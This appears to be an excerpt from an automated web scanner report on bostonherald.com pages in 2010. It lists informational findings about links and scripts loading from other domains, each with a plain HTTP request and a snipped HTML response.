<p>Check out my review of <a href="http://www.backbaysocialclub.com">Back Bay Social Club</a> in <a href="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105.jpg"><img class="alignright size-medium wp-image-2368" title="efd7c5_ltpback20101105" src="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg" alt="" width="300" height="261" /></a>
...[SNIP]...
</a>. It&#8217;s the latest restaurant from former night club king Patrick Lyons&#8217;s Lyons Group&#8211;which is behind such eateries as Towne, <a href="http://www.scampoboston.com">Scampo</a>, <a href="http://www.sonsieboston.com">Sonsie</a> and <a href="http://www.summershackrestaurant.com">Jasper White&#8217;s Summer Shack</a>
...[SNIP]...
<br />

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/kerryByrne.gif" style="float:left; border: 1px #000 solid;">

<b>
...[SNIP]...
is career here
writing one of the nation's first newspaper beer columns. In his spare time,
he pens thoughtful Buffalo wing-themed haiku and publishes the critically
acclaimed <a href="http://ColdHardFootballFacts.com">ColdHardFootballFacts.com</a>. Kerry also writes for <a href="http://sportsillustrated.cnn.com/writers/kerry_byrne/archive/">SportsIllustrated.com</a>
...[SNIP]...
</div>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/donnaGoodison.gif?123=4234" style="float:left; border: 1px #000 solid;">
<b>
...[SNIP]...
</div>
       
<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/juliaRappaport.gif" style="float:left; border: 1px #000 solid">

<b>
...[SNIP]...
</b> is Assistant Arts and Lifestyle Editor at the Boston Herald,
where she writes the Sips column. An aspiring bon vivant, you can follow her
work and play at <a href="http://twitter.com/Julia_Rappaport">twitter.com/ Julia_Rappaport</a>
...[SNIP]...
<br>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/matSchaffer_phantom.gif" style="float:left; border: 1px #000 solid;">


<b>
...[SNIP]...
<a href=http://bostonherald.com/blogs/lifestyle/fork_lift/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

8.4. http://bostonherald.com/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:51:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 84874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/business/real_estate/view.bg?articleid=1294789&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Sal&rsquo;s pizza chief returns to recipe for Merrimack River revival"></a>
...[SNIP]...
<a href="http://bostonherald.com/business/general/view.bg?articleid=1294788&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg" alt="Martha Coakley. "></a>
...[SNIP]...
<a href="http://bostonherald.com/business/technology/general/view.bg?articleid=1294793&srvc=business&position=2"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg" alt="REPLAY: The &#36;90 300 Instant Camera(inset) replicates the function of the classic Polaroid camera - more or less, since the printout is about half the size. The &#36;200 Pogo offers both instant and digital photos.

">
</a>
...[SNIP]...
<a href="/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/3ef2c1_Segs_11072010.JPG" alt="SIZZLING: Attendance at Bruins games at the TD Garden is rising thanks to the electric addition of Tyler Seguin, as well as the scoring savvy of newcomer Nathan Horton and the goaltending of Tim Thomas." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/general/view/20101107bruins_cap_season_ticket_sales_more_single-game_seats_as_attendance_up_12/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/real_estate/view/20101107critics_hit_feds_appraisal_rules/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/c751fe_ltpkeith20101107.jpg" alt="Keith Olbermann" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/media/view/20101107olbermann_suspension_highlights_ethics_rules/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/technology/general/view/20101105qantas_ceo_faulty_design_may_be_behind_blowout/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101105/stp/64052d_qantas11052010.jpg" alt="A Singapore Airlines Airbus A-380 has its engine checked, at the Airport Zuerich, in Switzerland, Thursday, Nov. 4, 2010." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/technology/general/view/20101105qantas_ceo_faulty_design_may_be_behind_blowout/format=comments&srvc=business&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/automotive/view/20101107blinking_jetta_hates_her_husband/format=comments&srvc=business&position=also">
...[SNIP]...
<a href="/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=business&position=also"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/20ad74_SBiz_11072010.jpg" alt="HANGING IN THERE: Bill Fredericks, owner of AllCare Medical Supply in Millbury, is one of many home medical equipment supply businesses that is finding it tougher to survive because of government and insurance company regulations." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=business&position=also">
...[SNIP]...
<h3><a href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Recent Headlines from AP</a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports"></script>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/the_ticker/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/ticker.gif" alt="The Ticker" />
           Retailers roll out big deals for holiday shopping season
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/working_stiff/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/workingStiff.gif" alt="Working Stiff" />
           How great would it be if YOUR boss gave you a paid week off to exercise?
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/getting_real/">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/getting_real.gif" alt="Getting Real" />
           Congressional shift may bring mortgage changes
           </a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business" target="_new">All Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/automotive" target="_new">Automotive</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/general" target="_new">Business & Markets</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/healthcare" target="_new">Healthcare</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/media" target="_new">Media & marketing</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/real_estate" target="_new">Real Esate</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology" target="_new">Technology</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/technology/reviews" target="_new">Technology Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/business/womens" target="_new">Women's Business</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/jobfind/news/your_career" target="_new">Your Career - Jobfind</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<span class="bold" /><a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE">Quote:</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">52 Week High/low</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&amp;idx=3&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Index Performance</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Market Movers</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a><br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">A-Z List</a>
...[SNIP]...
<br />
&nbsp;<a class="orange" href="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&amp;SITE=MABOH&amp;SECTION=DJSP_COMPLETE">Quickrank</a>
...[SNIP]...
<td class="t4" align="left" height="15" colspan="5"><a href="http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn" class="head-link">Overnight
Averages</a>
...[SNIP]...
<td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&amp;prods=1" class="sidebar-link">30 yr fixed mtg</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&amp;prodtype=M&amp;thisponsor=cf1&amp;ad=mtg&amp;nav=mtg30year_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/home-equity/?pid=p:bhn&amp;prods=50" class="sidebar-link">$30K HELOC</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=50&amp;prodtype=L&amp;ad=loan&amp;nav=heloc30k_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/auto/?pid=p:bhn&amp;prods=39" class="sidebar-link">48 month new car loan</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=39&amp;prodtype=A&amp;ad=auto&amp;nav=48mo_newcar_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/cd-investments/?pid=p:bhn&amp;prods=15&amp;local=true" class="sidebar-link">1 yr CD</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=15&amp;prodtype=D&amp;ad=dep&amp;nav=1yearcd_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif" width="11" height="6" vspace="4" /></td>
...[SNIP]...
<!-- // NDN Widget // -->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.5. http://bostonherald.com/business/general/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /business/general/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/general/view.bg?articleid=1294575&srvc=home&position=comment HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:56:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Sunday, November 7, 2010" />

   <link rel="alternate" title="Business &amp; Markets - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/general/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2Fview.bg%3Farticleid%3D1294575%26srvc%3Drss&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1294575&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1294575&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1294575&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(7) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Bruins cap season ticket sales');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/teamstats.aspx?team=121" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/players.aspx?id=740,pos=G,team=121,Type=Regular" >stats</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1294575&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(7) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101106/3ef2c1_Segs_11072010.JPG" alt="SIZZLING: Attendance at Bruins games..." /></div>
...[SNIP]...
<a href="/track/inside_track/view/20101108we_hear_cam_neely_kevin_youkilis_gordon_ramsey_and_more/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/eb101e_cam_11082010.jpg" alt="We Hear: Cam Neely, Kevin Youkilis, Gordon Ramsey and more..." /></a>
...[SNIP]...
<a href="/sports/hockey/bruins/view/20101106halak_post_too_strong_as_bruins_falter_in_shootout_against_blues/"><img src="http://multimedia.heraldinteractive.com/images/20101107/stp/4479a3_Bs_11072010.jpg" alt="Tuukka Rask, Bruins piped in SO, left feeling the Blues" /></a>
...[SNIP]...
<a href="/sports/hockey/bruins/view/20101106shawn_thornton_hits_300_with_goal_in_mind/"><img src="http://multimedia.heraldinteractive.com/images/20101106/stp/fa0e8a_Fite_11062010.jpg" alt="Shawn Thornton hits 300 with goal in mind" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
